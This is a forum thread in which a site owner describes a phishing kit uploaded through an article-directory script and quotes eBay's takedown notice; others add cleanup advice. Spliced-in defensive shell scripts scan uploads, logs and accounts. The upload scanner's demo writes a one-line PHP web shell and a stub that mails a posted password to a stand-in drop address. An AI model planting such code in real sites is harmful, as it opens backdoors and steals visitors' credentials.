An email you DON'T want to receive

24 replies
If you have an insecure php script on your web site you might just fall victim to a hacker that could get you into BIG TROUBLE with the feds. Such is the case that happened to one of my sites just recently.

I purchased an article directory script that (somehow) allowed the hacker to upload a phishing script to my server through the "upload photographs" feature. Fortunately, it was caught and removed within an hour of being uploaded (along with the script!), but not before I got this horrifying email from eBay (below). It is an email I don't want to receive again!

Here's the letter. I removed my site name (of course!).


Dear yoursite.com

We have just learned that your service is being used to display false, or "spoofed," PayPal.com pages, in an apparent effort to steal personal and financial information from consumers, and defraud PayPal users. Specifically, it appears that a yoursite.com user is sending unsolicited messages which misrepresent the sender as PayPal, and making false statements that encourage the recipient to go to a page hosted by you at

http://www.yoursite.com/Paypal/

asking to enter personal and account information. The purloined information is then sent to an email account and, based on our investigation of similar schemes, used to steal accounts and commit other fraudulent acts including international credit card and wire fraud.

This matter is urgent - we believe that consumers have been falsely directed to this page and may be fooled into divulging personal information to a criminal, if the page is not immediately disabled. We ask that you immediately disable the site at http://www.yoursite.com/Paypal/, as well as any associated email addresses, so that this fraudulent scheme can be stopped. We further request that you provide us with all contact information that you have for this user so that we may provide this information to the proper law enforcement authorities.

While we believe that the above information gives your company more than a sufficient basis for disabling the page immediately, out of caution we note that your user's unauthorized reproduction of PayPal's trademark and copyrighted materials violates federal law, and places an independent legal obligation on your company to remove the offending page(s) immediately upon receiving notice from PayPal, the owner of the copyrighted materials. Accordingly, the information below serves as PayPal's notice of infringement pursuant to the Digital Millennium Copyright Act, 17 U.S.C. Section 512(c)(3)(A):

I, the undersigned, CERTIFY UNDER PENALTY OF PERJURY that I am the agent authorized to act on behalf of the owner of certain intellectual property rights, said owner being named PayPal, Inc. I have a good faith belief that the website located at URL http://www.yoursite.com/Paypal/ has its copyright in each page of its website and associated source code. Please act expeditiously to remove or disable access to the material or items claimed to be infringing.

We sincerely appreciate your immediate attention to this important matter. We would also appreciate if you would take steps to confirm the accuracy of any contact information that your user may have provided to you in establishing the account. Should you have any accurate information that could assist PayPal and law enforcement in tracking this individual, we would greatly appreciate your assistance, as we know that you do not condone the use of your services for such criminal purposes.

Finally, please be advised that we have referred this issue to the Federal Bureau of Investigation for their investigation. The F.B.I. has requested that we convey to you in this message their request that you preserve for 90 days all records relating to this web site, including all associated accounts, computer logs, files, IP addresses, telephone numbers, subscriber and user records, communications, and all programs and files on storage media in regard to all Internet connection information, pursuant to 18 U.S.C. section 2703(f). While we do not act as an agent of the FBI in conveying this request, we do intend to fully cooperate with their investigation, and encourage you to do so as well.

eBay Inc.

Audit and Investigations

securityalerts@ebay.com

Get automated, real-time notifications of new phishing attacks! Join the Phish Report Network as a RECEIVER today! Phish Report Network: Fighting Online Fraud

It really pays to stay on top of your website security. I have 25 sites and I know what a pain it is - but it is absolutely necessary.

Also, don't just purchase any script from "just anybody" - check them out first. It's no fun to be hacked!

Linda
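The kit in Linda's story came in through the "upload photographs" feature, so the first thing to check on a server like hers is what is actually sitting in the upload directory. The audit below is an added example, not code from this thread, from Star Article Directory, or from any hosting product. It walks an upload tree and flags files with a server-side extension (including double extensions such as `x.php.jpg`), image-named files whose first bytes are not a JPEG, PNG or GIF signature, and any file at all that contains a PHP open tag. The demo directory and its four files at the bottom are constructed for the example; point `scan_uploads` at your own upload path.

```shell
#!/bin/sh
# Added example (not code from the thread or from any article-directory
# script): audit an upload directory for files that are not the images an
# "upload photographs" feature is supposed to accept. Three checks:
#   1. server-side extensions (.php, .phtml, double extensions like x.php.jpg)
#   2. image-named files whose first bytes are not a JPEG/PNG/GIF signature
#   3. any file, whatever its name, that contains a PHP open tag
# Output is one "reason<TAB>path" line per finding; a file can hit more than one.

# First four bytes of a file as lowercase hex, e.g. "ffd8ffe0" for a JPEG.
magic4() {
    od -A n -t x1 -N 4 "$1" | tr -d ' \n'
}

# Succeeds when the file's magic number matches a common web image format.
looks_like_image() {
    case "$(magic4 "$1")" in
        ffd8ff*)  return 0 ;;   # JPEG
        89504e47) return 0 ;;   # PNG
        47494638) return 0 ;;   # GIF (GIF87a / GIF89a)
    esac
    return 1
}

# Scan one directory tree. Usage: scan_uploads /var/www/html/uploads
# (file names containing newlines are not handled by the read loop)
scan_uploads() {
    find "$1" -type f | while IFS= read -r f; do
        case "$f" in
            *.php|*.php[0-9]|*.phtml|*.phar|*.php.*|*.cgi|*.pl|*.sh|*.htaccess)
                printf 'script-extension\t%s\n' "$f" ;;
        esac
        case "$f" in
            *.jpg|*.jpeg|*.png|*.gif)
                looks_like_image "$f" || printf 'fake-image\t%s\n' "$f" ;;
        esac
        if grep -q -e '<?php' -e '<?=' "$f" 2>/dev/null; then
            printf 'php-code\t%s\n' "$f"
        fi
    done
}

# Demo on a constructed directory: the four files below are made up for this
# example. Only good.jpg is a genuine image.
demo_dir=$(mktemp -d)
printf '\377\330\377\340JFIF' > "$demo_dir/good.jpg"            # real JPEG header bytes
printf '<?php mail("drop@example.com", "pw", $_POST["p"]); ?>' > "$demo_dir/kit.jpg"
printf '<?php eval($_POST["c"]); ?>' > "$demo_dir/evil.php"
printf '<html>hi</html>' > "$demo_dir/index.html"
scan_uploads "$demo_dir" | sort
```

The magic-number check is what catches the case the extension filter misses: a PHP file renamed to `.jpg` still serves as an image harmlessly, but if the upload directory allows execution (or the web server maps `x.php.jpg` to PHP), the name is irrelevant and the content is what matters. Run it from cron against every upload directory and diff the output against the previous run.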
  • Posted by talfighel
    Good advice Linda. Security is a big thing online.

    Thanks,

    Tal
    • Posted by bgmacaw
      That email looks suspiciously like a phishing scam I've seen before. It had links that at first glance looked legit but actually pointed to a phishing site on a .ru domain.
      • Posted by Linda Van Fleet
        Originally Posted by bgmacaw:

        That email looks suspiciously like a phishing scam I've seen before. It had links that at first glance looked legit but actually pointed to a phishing site on a .ru domain.
        Well, this one came directly from eBay and was not a scam. The script had been installed on my server - I found it there myself and removed it.

        I also got a notice from my hosting provider. eBay had informed them of the phishing script that had been installed on my server. I have a dedicated server with Liquid Web and they're great. They didn't shut my site down because I had immediately removed the script. They put a scan on the server to see if it had been compromised in any other way even though I was the one who had installed the insecure article directory script.

        It pays to have a good hosting provider!
  • Posted by Gene Pimentel
    Thanks for the reminder Linda. How did you remedy this (other than removing the phishing script)? Did you replace the php with something more secure? If so, how do you determine whether it's secure?
    • Posted by Linda Van Fleet
      Originally Posted by Gene Pimentel:

      Thanks for the reminder Linda. How did you remedy this (other than removing the phishing script)? Did you replace the php with something more secure? If so, how do you determine whether it's secure?
      I removed the article directory.

      Hindsight. I had read somewhere that the article directory script I had installed had security leaks. The developer did put out an upgraded version - but there was still chatter that it was insecure.

      Of course, that could never happen to me, I reasoned. I have phpsuexec installed and had also taken lots of other security measures. Stupidity in action! At any rate, when I saw the uploaded zip file I put 2 and 2 together and removed the entire script at about the same time I got the notice from eBay.

      I check my sites' files on a regular, on-going basis, looking for hacking activity. And, when using open source software (like WP and Joomla - two I use a lot) I make sure to update it every time a new version comes out. It is a hassle to be sure, but it is vital to online business.

      Linda
  • Posted by TLTheLiberator
    A real life case study about how we all can't be careful enough with the security of our websites.

    Thanks for the reminder.

    TL
  • Posted by PeteHarrison
    Hi Linda,

    What is the article directory script that has this backdoor?

    Pete
    • Posted by Linda Van Fleet
      Originally Posted by PeteHarrison:

      Hi Linda,

      What is the article directory script that has this backdoor?

      Pete
      Star Article Directory
      • Posted by seasoned
        Originally Posted by Linda Van Fleet:

        Star Article Directory
        Actually, in theory, you COULD use the download option in almost ANY poorly written script, MOST ARE, to do this using a MAJOR security flaw built into UNIX that MANY programs, such as http, depend on. LUCKILY, PHP DOES have an option, I forget its name, and don't want to be TOO specific, that is to limit such an attack. It IS under the cpanel setup for HTTP though. ALSO, this is ANOTHER reason to use groups properly, and NEVER start http as root.

        And yeah, I have been too lax in checking MY server. I am going to have to get back into that. I have had four attacks, over about 10 years...

        1. Using FTP, that I setup for someone else, for illegal distribution of movies.
        2. Two more using a webroot kit.
        3. Another using a STUPID hole in mail that should NEVER have been there EVER! Ironically, it isn't publicised much.

        BTW #2 used the SAME hole I bet they used with that directory. Right now, an attempt to use those programs would fail with a privilege violation, and I doubt they are smart enough to even figure out what is wrong. HECK, it hasn't recurred for 8 or 9 years, so I guess I am right.

        Steve
  • Posted by Just_Mel
    Thank you so much for posting this - I had a site hacked just a couple of weeks ago and man is it a pain in the rear!

    Luckily it wasn't this bad but it reinforced the fact that your files are not as secure as you would think, and it isn't just the corporations that these jack$@~es go after!

    Mine was literally the first site I put up with a new hosting provider and it was hacked the day after it went live - YUK!

    Some people really need to get a life

    Wishing you the best of luck in the future,

    Mel
    • Posted by halfpoint
      It seems as though there are more and more threads about sites being hacked popping up here each week.

      As someone who has absolutely no idea how servers and the like work, I wouldn't have the slightest idea of what to do if this was to happen to me.

      What steps can we take to ensure that our files are as secure as they can be?

      Also, I have noticed that many of the people who post on here with hacked sites are generally using Wordpress. Are you less vulnerable if your site is just html?
      • Posted by Linda Van Fleet
        Originally Posted by Pat Jackson:

        It seems as though there are more and more threads about sites being hacked popping up here each week.

        As someone who has absolutely no idea how servers and the like work, I wouldn't have the slightest idea of what to do if this was to happen to me.

        What steps can we take to ensure that our files are as secure as they can be?

        Also, I have noticed that many of the people who post on here with hacked sites are generally using Wordpress. Are you less vulnerable if your site is just html?
        Here's a link for tightening up security on WP: Hardening WordPress (WordPress Codex)

        I have been using WP for years and have never been hacked. However, a couple of my Joomla sites were hacked right after the Mambo/Joomla split.

        Any site - whether plain html based or php -- has vulnerabilities. Hackers are relentless, hammering at servers constantly trying to find a backdoor in the system. I had no clue about this when I was on a shared server but since I have a dedicated server I can tell you the log files are full of people trying different passwords to gain access.

        But, you can't live in a dark hole of fear about it. It is a fact of life. Keeping your site updated with the most current releases is the least you should do. Also, tighten the permissions as much as possible, meaning don't allow public read, write, execute on a file unless absolutely necessary.
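Linda's point about log files full of password guessing is easy to turn into a routine check. The functions below are an added example, not part of her post or of any product mentioned in the thread: they summarise an sshd auth log by source address, list the addresses over a failure threshold, and then look for the case that actually matters, a successful login from one of those addresses. The six log lines are constructed for the example and use RFC 5737 documentation addresses; that a real host writes these lines to /var/log/auth.log or /var/log/secure is an assumption about your distribution.

```shell
#!/bin/sh
# Added example, not from the thread: summarise password-guessing attempts
# in an sshd auth log. The log lines at the bottom are constructed for this
# example (RFC 5737 documentation addresses). On a real host pass
# /var/log/auth.log (Debian/Ubuntu) or /var/log/secure (RHEL-style) instead.

# Failed logins per source IP, most active first. Output: "<count> <ip>".
failed_logins_by_ip() {
    grep 'Failed password for' "$1" \
      | awk '{ for (i = 1; i <= NF; i++) if ($i == "from") { n[$(i+1)]++; break } }
             END { for (ip in n) printf "%d %s\n", n[ip], ip }' \
      | sort -rn
}

# Source IPs with at least <threshold> failures. Usage: brute_force_sources LOG 10
brute_force_sources() {
    failed_logins_by_ip "$1" | awk -v t="$2" '$1 >= t { print $2 }'
}

# The alarming case: an "Accepted" line from an address that had been guessing.
# Output: "<ip> <user>". Usage: accepted_from_brute_forcers LOG 10
accepted_from_brute_forcers() {
    brute_force_sources "$1" "$2" | while IFS= read -r ip; do
        grep -F "from $ip " "$1" | grep 'Accepted ' \
          | awk -v ip="$ip" '{ for (i = 1; i <= NF; i++) if ($i == "for") { print ip, $(i+1); break } }'
    done
}

# Constructed sample: one address guesses three times and then gets in,
# another fails once, a third logs in normally with a key.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
Jan 12 03:14:01 web sshd[2201]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Jan 12 03:14:03 web sshd[2201]: Failed password for invalid user admin from 203.0.113.5 port 51235 ssh2
Jan 12 03:14:05 web sshd[2203]: Failed password for root from 203.0.113.5 port 51236 ssh2
Jan 12 03:14:09 web sshd[2205]: Accepted password for root from 203.0.113.5 port 51240 ssh2
Jan 12 03:20:11 web sshd[2301]: Failed password for root from 198.51.100.7 port 2222 ssh2
Jan 12 04:00:00 web sshd[2400]: Accepted publickey for linda from 192.0.2.10 port 40000 ssh2
EOF

echo "failed logins by source:";     failed_logins_by_ip "$SAMPLE_LOG"
echo "brute-force sources (>= 3):";  brute_force_sources "$SAMPLE_LOG" 3
echo "successful logins from them:"; accepted_from_brute_forcers "$SAMPLE_LOG" 3
```

The third function is the one to alert on: a long list of failures is background noise on any Internet-facing host, but a success from the same source means a password was guessed (or reused) and the account needs to be locked and the key rotated, not just the IP blocked.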
        • Posted by halfpoint
          Originally Posted by Linda Van Fleet:

          Here's a link for tightening up security on WP: Hardening WordPress (WordPress Codex)

          I have been using WP for years and have never been hacked. However, a couple of my Joomla sites were hacked right after the Mambo/Joomla split.

          Any site - whether plain html based or php -- has vulnerabilities. Hackers are relentless, hammering at servers constantly trying to find a backdoor in the system. I had no clue about this when I was on a shared server but since I have a dedicated server I can tell you the log files are full of people trying different passwords to gain access.

          But, you can't live in a dark hole of fear about it. It is a fact of life. Keeping your site updated with the most current releases is the least you should do. Also, tighten the permissions as much as possible, meaning don't allow public read, write, execute on a file unless absolutely necessary.
          Thanks for the link, Linda.

          Although I don't use Wordpress, I'll keep that page bookmarked in case I do down the track.

          It just seems to me that a majority of the people who post threads about being hacked are using Wordpress. My sites are static html pages that once created, I seldom change much at all.

          What other measures I should be taking?

          Feel free to chime in as well, James. I've noticed in other threads you're very knowledgeable on this subject!
          • Posted by TheRichJerksNet
            Originally Posted by Pat Jackson:

            Thanks for the link, Linda.

            Although I don't use Wordpress, I'll keep that page bookmarked in case I do down the track.

            It just seems to me that a majority of the people who post threads about being hacked are using Wordpress. My sites are static html pages that once created, I seldom change much at all.

            What other measures I should be taking?

            Feel free to chime in as well, James. I've noticed in other threads you're very knowledgeable on this subject!
            See my post above Pat ...

            As for static sites, again you want to make sure you have a secured host.. At the same time you want to make sure your computer system is clean. I use Kaspersky Lab's anti-virus and Internet security software on my Intel Mac that runs Windows XP, it is really great software.. Cost a little bit but well worth it as I get no troubles on my Windows XP system.

            I have always told clients to keep passwords and usernames the old-fashioned way .. On a sheet of "real" paper written down with a "real" pen, I do not keep any passwords on my system at all..

            James
      • Posted by TheRichJerksNet
        Originally Posted by Pat Jackson:

        It seems as though there are more and more threads about sites being hacked popping up here each week.

        As someone who has absolutely no idea how servers and the like work, I wouldn't have the slightest idea of what to do if this was to happen to me.

        What steps can we take to ensure that our files are as secure as they can be?

        Also, I have noticed that many of the people who post on here with hacked sites are generally using Wordpress. Are you less vulnerable if your site is just html?
        Pat,
        This has been going on for years...

        The past five years have seen the popularity of blogs grow in their use and as a means of making money. That's the meat that computer hackers look to sink their teeth into. A recent report by the Congressional Research Service stated that the financial impact of computer hackers amounts to $226 billion annually. Another report calculated that hackers could be taking up to six cents of every Internet dollar of revenue.

        Fact is anything online is subject to hackers, warez users, scammers, etc.. Nothing is ever going to change that. You can do many things to protect yourself though. As for wordpress I created the only real solution that hundreds of customers are happy with.

        James
  • Posted by TheRichJerksNet
    This is why I always suggest getting a custom script built by a professional. Also getting proper hosting, the script may have not been coded with security (as many are not) but it is the host that allowed the permissions to be set for the hacker to execute the hacking files.

    One of the most secure systems for hosting that you can get is : Unix Server with Cpanel 11 with Php5+ and Apache Compiled with PhpSuexec

    Anything other than that and you are at higher risk.. If budget allows it is also best to go dedicated. I have lost entire sites with 10,000+ members due to a host that was not secured, reason why I moved to hostgator and have not had a problem since.

    James
    • Posted by Linda Van Fleet
      Originally Posted by TheRichJerksNet:

      ... it is the host that allowed the permissions to be set for the hacker to execute the hacking files.

      One of the most secure systems for hosting that you can get is : Unix Server with Cpanel 11 with Php5+ and Apache Compiled with PhpSuexec

      Anything other than that and you are at higher risk.. If budget allows it is also best to go dedicated. ....
      James
      That's exactly what I have, James, a dedicated Unix Server with Cpanel 11 with Php5+ and Apache Compiled with PhpSuexec.

      It can still happen -- did happen. It was my fault and I know it. But it was not because I didn't have the right server permissions; it was because I was using a script that has a security hole.

      You are absolutely correct in saying the best thing to do is have your own scripts built from scratch - but unfortunately, most people cannot afford to do that.
      • Posted by TheRichJerksNet
        Originally Posted by Linda Van Fleet:

        That's exactly what I have, James, a dedicated Unix Server with Cpanel 11 with Php5+ and Apache Compiled with PhpSuexec.

        It can still happen -- did happen. It was my fault and I know it. But it was not because I didn't have the right server permissions; it was because I was using a script that has a security hole.

        You are absolutely correct in saying the best thing to do is have your own scripts built from scratch - but unfortunately, most people cannot afford to do that.
        If you need a custom built article directory I can supply you with one at a very reasonable price.. This is the exact reason why I am building a custom membership script right now because I understand people just can not afford those expensive solutions that offer very little unless you pay an arm and a leg and then give up your first born to have some plugins that may or may not be secured...

        James
      • Posted by Floyd Fisher
        Originally Posted by Linda Van Fleet:

        That's exactly what I have, James, a dedicated Unix Server with Cpanel 11 with Php5+ and Apache Compiled with PhpSuexec.

        It can still happen -- did happen. It was my fault and I know it. But it was not because I didn't have the right server permissions; it was because I was using a script that has a security hole.

        You are absolutely correct in saying the best thing to do is have your own scripts built from scratch - but unfortunately, most people cannot afford to do that.
        Any script could have such a vulnerability in it. Don't beat yourself up over it, it's par for the course.

        Also, I highly doubt you're going to see any visits from the feds either. They usually don't move in unless $10,000 in damages can be proved.

        Do as they suggest (and I'd talk to a lawyer as well just in case), but don't fret too much over it.
        • Posted by seasoned
          Originally Posted by Floyd Fisher:

          Any script could have such a vulnerability in it. Don't beat yourself up over it, it's par for the course.

          Also, I highly doubt you're going to see any visits from the feds either. They usually don't move in unless $10,000 in damages can be proved.

          Do as they suggest (and I'd talk to a lawyer as well just in case), but don't fret too much over it.
          Floyd is right! Just DISABLE the site ASAP! The best way is probably to take the base directory, set the mode to 700, and change the name. Try to access it with the new name, and it SHOULD fail. ALSO, backup as much of the server logs as you can, and try to get at least say 100 days there. It would be a good idea to then download that to a disk, and stash it away clearly marked. ONE MORE THING! Recreate a directory with the same name as the first originally had, and set IT 700! That MIGHT frustrate the hackers if they come back. And try to plug up the holes. You might be able to look at the logs and get an idea of their plan of attack. ALSO, check /etc/passwd to see if they created accounts, and get a rootkit hunter to see if they installed a rootkit.

          After all that is done, just check it every now and then. Even checking disk space, if you're on a throttled account, or your own server, can be enough to determine if anyone likely did something.

          Steve
          • Posted by Linda Van Fleet
            Originally Posted by seasoned:
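Steve's containment and evidence steps, written out as shell functions so they can be run in one sitting rather than typed from memory while the eBay email is still open. This is an added example and not Steve's code; the `/var/www` and `/var/log` paths in the comments are illustrative, and `sha256sum` versus `shasum` is an assumption about which hashing tool the host provides. The functions quarantine the phishing directory (owner-only permissions, moved aside under a timestamped name, an empty 700 directory left in its place as a decoy), bundle logs and the quarantined kit into an archive with a SHA-256 manifest, list any UID 0 accounts other than root in a passwd file, and list files changed in a tree within the last N days.

```shell
#!/bin/sh
# Added example, not from the thread: the containment and evidence steps
# Steve describes, as functions. Paths in comments are illustrative; nothing
# here touches a real system unless you call the functions on one.

# Take the phishing directory offline without destroying it: strip group and
# world permissions, move it aside under a timestamped name, and leave an
# empty owner-only directory at the original path so a returning attacker
# gets a 403 instead of a writable target. Prints the quarantined path.
# Usage: quarantine_dir /var/www/html/Paypal
quarantine_dir() {
    src="$1"
    dst="${src}.quarantined.$(date +%Y%m%d%H%M%S)"
    chmod -R go-rwx "$src"
    mv "$src" "$dst"
    mkdir "$src" && chmod 700 "$src"
    printf '%s\n' "$dst"
}

# SHA-256 of one file; sha256sum (GNU coreutils) or shasum (macOS/BSD perl).
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1"; else shasum -a 256 "$1"; fi
}

# Bundle logs (and the quarantined kit) into one archive plus a SHA-256
# manifest, so the copy handed to the host or law enforcement can be shown to
# be unchanged. Prints the archive path.
# Usage: preserve_evidence /root/ir /var/log/apache2 /var/log/auth.log /var/www/html/Paypal.quarantined.*
preserve_evidence() {
    outdir="$1"; shift
    archive="$outdir/evidence-$(date +%Y%m%d%H%M%S).tar.gz"
    tar -czf "$archive" "$@"
    hash_file "$archive" > "$archive.sha256"
    printf '%s\n' "$archive"
}

# Accounts other than root with UID 0, a classic persistence trick to look for
# in /etc/passwd. Usage: extra_root_accounts [/etc/passwd]
extra_root_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "${1:-/etc/passwd}"
}

# Files under DIR modified within the last DAYS days, sorted by path; compare
# the list against your last legitimate deploy. Usage: recently_changed /var/www/html 7
recently_changed() {
    find "$1" -type f -mtime -"$2" | sort
}
```

Order matters: quarantine first (it stops the victims' data flowing), then preserve, then hunt. `extra_root_accounts` and `recently_changed` are the first two of Steve's "see what they did" checks; a rootkit hunter such as rkhunter or chkrootkit covers the rest and is not reproduced here.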

            Floyd is right! Just DISABLE the site ASAP! The best way is probably to take the base directory, set the mode to 700, and change the name. Try to access it with the new name, and it SHOULD fail. ALSO, backup as much of the server logs as you can, and try to get at least say 100 days there. It would be a good idea to then download that to a disk, and stash it away clearly marked. ONE MORE THING! Recreate a directory with the same name as the first originally had, and set IT 700! That MIGHT frustrate the hackers if they come back. And try to plug up the holes. You might be able to look at the logs and get an idea of their plan of attack. ALSO, check /etc/passwd to see if they created accounts, and get a rootkit hunter to see if they installed a rootkit.

            After all that is done, just check it every now and then. Even checking disk space, if you're on a throttled account, or your own server, can be enough to determine if anyone likely did something.

            Steve
            Thanks Guys. No worries, here - just wanted to share with my fellow WF members so all will take more care with site security. As I posted earlier, I've already stopped the hacker on my site and have moved on down the road.

            Thanks for your input. It's great to have such a big, sharing community.

            Linda
  • Posted by milan
    James, I thought you said don't advertise your stuff in the main forum and ask other people to do the same?

    Anyways, whether a script is custom made or not has nothing to do with security in place. Attackers are more likely to find you if you don't use a custom script. But, security flaws of those scripts are more quickly uncovered and fixed. That's because the whole community of users helps with the security. Once somebody gets attacked, more people help and there is a way to spread the news. With a custom script you're all alone. So, if a script is good and gets supported over time it usually gets secure enough. If you hear from other users about the security problems on and on - you know to move on. That's another privilege you don't have with a custom made script, you have to trust the programmer and that's it. And more eyes are better for security than a pair (who is also in a developer mindset, not in a hacker mindset).

    Basically, both ways have their pros and cons.
    • Posted by Linda Van Fleet
      Originally Posted by milan:

      ... If you hear from other users about the security problems on and on - you know to move on.
      And don't ignore the warnings! So many people think "that's them" and "it could never happen to me" like I used to think. I'm pretty savvy but it was just plain stupid on my part to ignore what other folks were saying. I'm happy to say I got born again!

      Originally Posted by milan:

      That's another privilege you don't have with a custom made script, you have to trust the programmer ...
      Trust is a really big issue - even in a forum such as this one. But, I would think it's a lot safer in the WF to find a trusted programmer than in places like elance or getafreelancer. I've used both those services and I am nervous until the job is done.


      Originally Posted by milan:

      And more eyes are better for security than a pair (who is also in a developer mindset, not in a hacker mindset).
      That's why I love WP and Joomla. They are so fast to fix security holes.

      Linda
